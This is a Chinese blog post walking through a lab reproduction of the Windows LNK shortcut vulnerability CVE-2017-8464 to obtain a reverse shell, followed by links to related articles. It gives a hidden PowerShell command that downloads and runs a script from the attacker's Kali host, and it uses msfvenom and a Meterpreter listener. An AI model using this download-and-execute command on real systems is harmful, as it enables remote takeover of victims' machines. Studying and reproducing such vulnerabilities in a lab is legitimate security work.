震网三代反弹shell

于 2022-05-19 18:55:50 发布
阅读量176 收藏
点赞数
分类专栏: CVE 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45455136/article/details/124867839
版权

CVE-2017-8464漏洞

CVE-2017-8464介绍

Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统

传播载体一般为LNK,LNK是windows系统内应用快捷方式文件的文件类型后缀名。被攻击机插入存在恶意的LNK的U盘后会反弹shell,可以在不上网的情况下攻击被隔离的内网

漏洞复现

  • win10:192.168.37.133
    关闭实时防护
  • kali:192.168.37.130
    使用msfvenom生成包含反弹连接的快捷方式文件,并开启apache服务
    在这里插入图片描述
    win10上创建快捷方式test,目标指向kali快捷文件
    powershell -windowstyle hidden -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.37.130/link.ps1’);test.ps1”
    在这里插入图片描述
    kali启动msfconsole,使用监听模块,设置payload与msfvenom生成的后门使用的payload一致,查看需设置的参数
    在这里插入图片描述
    配置LHOST和LPORT与msfvenom生成的后门使用的LHOST和LPORT一致,开启监听
    在这里插入图片描述
    win10双击快捷方式test后,kali直接进入meterpreter
    在这里插入图片描述
    执行shell进入windows命令行,发现有中文乱码
    在这里插入图片描述
    修改显示编码为UTF-8即可解决中文乱码
    在这里插入图片描述
c1o22
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
三代利用
qq_38240166的博客
05-16 1768
笔者在最近想了个问题,学校机房关闭进不去,然后教师机子无ip如何黑入,而且不在同一个段下面,如何入侵呢,于是看到莲一篇关于隔离络攻击的文章。想到了一年前一个漏洞,于是测试开始。首先我们来了解一下“三代”它可以利用移动介质,受害者只要开启了自动播放或者点击了漏洞触发就会使系统触发漏洞。环境:            ubuntu16.04            vmware14  and wi...
常见的反弹shell的方法以及对反弹shell的解释
qq_45584159的博客
03-04 1万+
文章目录一.什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&、&>常见linux提权 一.什么是反弹shell,以及对反弹shell作用原理的解析: 1.定义 通俗来说,shell就是实现用户命令的接口,通过该接口我们能实现对计算机的控制(root权限), 而反弹shell就是将shell反弹给攻击者
CVE2017-8464:三代漏洞分析
qq_42365249的博客
08-25 303
CVE2017-8464:三代漏洞分析(转) 转载 本文由Kilig原创发布 转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/214846 安全客 - 有思想的安全新媒体
”三代和二代漏洞技术分析报告
爱国小白帽
04-08 908
”三代和二代漏洞技术分析报告 360-CERT [360CERT](javascript:void(0)???? 今天 0x00 概述 2017年6月份微软补丁发布了一个针对Windows系统处理LNK文件过程中发生的远程代码执行漏洞,通用漏洞编号CVE-2017-8464。 当存在该漏洞的电脑被插上存在漏洞文件的U盘时,不需要任何额外操作,漏洞攻击程序就可以借此完全控制用户的电脑系统。同时,该...
U盘目录穿越获取车机SHELL(内含模拟环境可上手实践)
weixin_40418457的博客
05-11 872
​ 利用 U 盘 Getshell 是不是还停留在 Badusb、病毒U盘上,这次就来看一个不一样的。前段时间在浏览 Github 时看到了一个日产车机破解项目,其中有利用 U 盘获取车机 SHELL 的骚操作。感觉挺有意思的,花了点时间找到了车机固件并复现了漏洞。顺手写了一个 Dockerfile 供大家一起玩耍。 目录穿越 ​ 目录穿越大多发生在 WEB 中,没想到竟然还能出现在硬件设备中。 ​ 车机的操作系统为 Linux,U 盘等外设热插拔由 udev 实现。ud
82-82.渗透测试-CVE-2017-8464“三代 反弹shell演示课件.mp4
最新发布
05-10
82-82.渗透测试-CVE-2017-8464“三代 反弹shell演示课件.mp4
反弹shell小工具源码
10-12
依赖PHP环境。修改IP、端口,自动生成命令
php反弹shell实现代码
10-30
遇到一个BT的站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
【不一样的视角剖析Linux 反弹shell】这篇文档深入探讨了Linux环境下反弹shell的详细知识,作者从独特的角度出发,挑战了传统的分类方法,为读者提供了更细致的理解。反弹shell是渗透测试中的关键技术,它涉及被控端...
反弹 shell 常见方式详解(非常实用)
10-18
反弹 shell 常见方式详解(非常实用) [ 隧道技术 ] 反弹shell(一)nc反弹shell [ 隧道技术 ] 反弹shell(二)bash反弹shell [ 隧道技术 ] 反弹shell(三)powercat反弹shell [ 隧道技术 ] 反弹shell(四)python...
利用BadUSB穿透3层内
null
12-20 3447
转自微信公众号:湛卢工作室 作为一个安全人员,听过许多社工APT案例,钓鱼邮件、水坑攻击、丢个u盘等等。前段时间在一次培训中了解到BadUSB的攻击方式,可以通过U盘达到控制服务器的效果,在著名的美剧《黑客军团》中也出现了在停车场扔BadUSB来进行钓鱼的场景。 一时好奇,于是尝试模拟一次社工,利用VMware搭建了3层络靶场,通过BadUSB+MSF的攻击手段,一步一步渗透到第三层络...
lnk漏洞(快捷方式漏洞)全面解析
weixin_34323858的博客
07-21 487
lnk漏洞(快捷方式漏洞)全面解析 7月16日,Windows lnk漏洞(快捷方式漏洞)的相关信息被披露,因为利用这个漏洞传播恶意软件具备“看一眼就中”的显著特性,立即引发安全厂商的高度关注。 本资料试图向公众完整解释与lnk漏洞(快捷方式漏洞)有关的信息,提醒公众高度重视,尽早采取必要的防范措施。 lnk漏洞(快捷方式漏洞)是什么? 在我们平时启动电脑上的程序时,很多情况下是先双击程序...
MS10-046_LNK文件快捷方式漏洞的原理分析(多图杀猫)
GaA.Ra的自留地 in Csdn
06-10 1万+
文件快捷方式漏洞MS10-046是除了n年前的动画光标(.ani)漏洞之外另一个让我觉得比较有趣的漏洞,毕竟是本机执行任意代码的权限,当然,n年前我还只是一个菜鸟,神马都不懂.       入正题吧,欢迎拍砖,大家一起进步.(后面我会把一些参考文章贴出来的)       由于MS10-046的漏洞是在shell32.dll当中,windows出于美化的目的,会现实快捷方式的图标,这个图标可
LNK快捷方式漏洞利用方式 exp制作教程
weixin_34090562的博客
10-28 265
前言windows的shell32在处理控制面板程序的快捷方式文件时,存在一个漏洞,能够载入硬盘上的随意DLL文件,就可以运行随意代码。 漏洞文件的生成到“控制面板”以下,右键点“显示”,点“创建快捷方式”,把快捷方式创建在桌面上。然后在桌面用WinHex打开“显示.lnk”文件。 Offset      0 1 2 3 4 5 6 7   8 9 A B C D E F 00000...
[转]LNK文件漏洞简要分析
weixin_33753003的博客
07-23 280
原文URL:http://www.myhack58.com/Article/html/3/92/2010/27669.htm                http://bbs.pediy.com/showthread.php?p=838548 更多参考URL: http://www.exploit-db.com/exploits/14403/ http://communi...
MS10-046文件快捷方式漏洞复现与利用
sGanYu
11-07 4895
攻击机:kali 靶机:windows xp sp2 使用metasploit框架,需要启用metasploit所依赖的postgresql数据库 在kali上启动postgresql命令【systemctl start postgresql】 如果想查看postgresql是否开启可以使用【systemctl status postgresql】,这里显示active表示已经打开 启动msfconsole 搜索ms10-046相应的模块 这里有两个可利用的模块,browser.
文件解析漏洞总结
热门推荐
龙哥盟
02-19 4万+
一、IIS 5.x/6.0解析漏洞IIS 6.0解析利用方法有两种1.目录解析/xx.asp/xx.jpg2.文件解析cracer.asp;.jpg第一种,在站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。例如创建目录 cracer.asp,那么/cracer.asp/1.jpg将被当作asp文件来执行。假设黑阔可以控制上传文件
冰蝎不出反弹shell
09-06
因此,冰蝎客户端可以通过常规Shell或Meterpreter反弹Shell的方式进行不出的操作。同时,它还提供了虚拟终端功能来实现内穿透。<span class="em">1</span><span class="em">2</span><span class="em">3 #### ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值